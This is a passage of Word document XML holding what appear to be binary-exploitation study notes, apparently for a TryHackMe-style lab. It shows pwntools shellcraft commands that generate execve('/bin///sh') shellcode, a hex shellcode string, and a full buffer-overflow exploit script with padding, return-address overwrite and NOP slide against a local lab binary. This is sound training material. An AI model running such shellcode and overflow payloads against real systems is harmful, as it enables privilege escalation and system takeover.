      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> option</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1D504E" w14:textId="2A2D3DDB" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> &lt;architecture&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AACB1C" w14:textId="2149C6E5" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> i386.linux.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26600F5E" w14:textId="37413918" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>to keep privileges of running program</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3831AC" w14:textId="0E4904C5" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>-p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2248B643" w14:textId="6C31C7D8" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E44F38">
        <w:t xml:space="preserve">We can use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t xml:space="preserve"> to create </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>execve</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t xml:space="preserve"> shellcode with"/bin///</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>" and "['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>', '-p']" as parameters. We can do this with the following command:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CCC9F41" w14:textId="7E250703" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>shellcraft</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>i386.linux.execve</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t xml:space="preserve"> "/bin///</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>" "['</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00E44F38">
        <w:t>', '-p']" -f a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D8AFB11" w14:textId="4F965BC7" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E44F38">
        <w:t>To write shellcode that is easier to use in our python exploit script, we can replace the "-f a" with "-f s", which will print our shellcode in string format</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="564BBB22" w14:textId="3E2AE447" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="00E44F38">
        <w:t>shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8451C9" w14:textId="3D1F5661" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Exploit Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BE8CE1" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pwn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432F6C3B" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D57DAC5" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>proc = process(</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>'./</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>intro2pwnFinal')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E70680B" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39545BD7" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>proc.recvline</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74542C08" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C2A2272" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>padding = cyclic(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cyclic_find</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>taaa</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>'))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57784CD9" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D290E14" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = p32(0xffffd510+200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B0DE8A9" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA37B9B" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop_slide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = "\x90"*1000</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC9A57B" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BDE0DB1" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C00701" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41D9AB0C" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">payload = padding + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nop_slide</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> + shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683C499" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181A083D" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>proc.send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>(payload)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BAB9CB" w14:textId="77777777" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76419F6D" w14:textId="19191763" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>proc.interactive</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A2E1F7" w14:textId="19EE217D" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F877CBE" w14:textId="28E89623" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidRPr="005652AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="238EC1CA" w14:textId="55E3E214" w:rsidR="00E44F38" w:rsidRDefault="00E44F38" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidRPr="005652AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://exploit.education/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1AAA0A47" w14:textId="1757740B" w:rsidR="00E44F38" w:rsidRDefault="004F18C1" w:rsidP="00E44F38">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="50"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r w:rsidRPr="005652AC">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/guyinatuxedo/nightmare/tree/master/modules</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="77458F62" w14:textId="51196C3E" w:rsidR="004F18C1" w:rsidRDefault="004F18C1" w:rsidP="004F18C1">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3221604B" w14:textId="77777777" w:rsidR="004F18C1" w:rsidRPr="0084205E" w:rsidRDefault="004F18C1" w:rsidP="004F18C1">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="004F18C1" w:rsidRPr="0084205E" w:rsidSect="0084205E">
      <w:headerReference w:type="defaul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1AF7" w14:textId="77777777" w:rsidR="00544BE7" w:rsidRDefault="00544BE7" w:rsidP="002C497A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="744D1830" w14:textId="77777777" w:rsidR="00544BE7" w:rsidRDefault="00544BE7" w:rsidP="002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3300" w14:textId="77777777" w:rsidR="00544BE7" w:rsidRDefault="00544BE7" w:rsidP="002C497A">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1AFF9094" w14:textId="77777777" w:rsidR="00544BE7" w:rsidRDefault="00544BE7" w:rsidP="002C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B722" w14:textId="7A620E71" w:rsidR="00383269" w:rsidRDefault="00383269">
    <w:pPr>
      <w:pStyle w:val="Header"/>
    </w:pPr>
    <w:proofErr w:type="spellStart"/>
    <w:r>
      <w:t>PenTest</w:t>
    </w:r>
    <w:proofErr w:type="spellEnd"/>
    <w:r>
      <w:t>+ Voucher code is TryHackMe2021 – use before 12/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1D"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="07B2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D3E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="706C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5BB0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7EB2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49CD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E8800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EA14C1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B036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72B5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C86A0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3231"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84AE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20410"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EE80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A4FAD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="BA82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C0CB2"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="84BA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B0BC7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15C4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03C0A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="26A6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C6412"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1D7C6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9609CF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D45C6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C0141"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B28C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C1A0C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C664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60D8F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C6424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A4071C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D84C8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67780"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="9452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600847"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91A8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20D6F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2ED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D2D6C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7B3C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14711"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4ED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7769C"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3004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539C7"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="913C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347ED"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="2A04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36DAF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="211A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30FCC"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="840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37AC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7C626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2A1992"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="94447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DA7751"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6BBE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67517"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="7996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A290E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8DEE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806FD"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="AF9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0997"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D10D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5014DA9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0040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266DA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="064C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32CA0"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4D1EC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B721B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="721A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57D6B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66CC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A3088"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="33663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110DB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CBC6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43222"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4B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97133"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
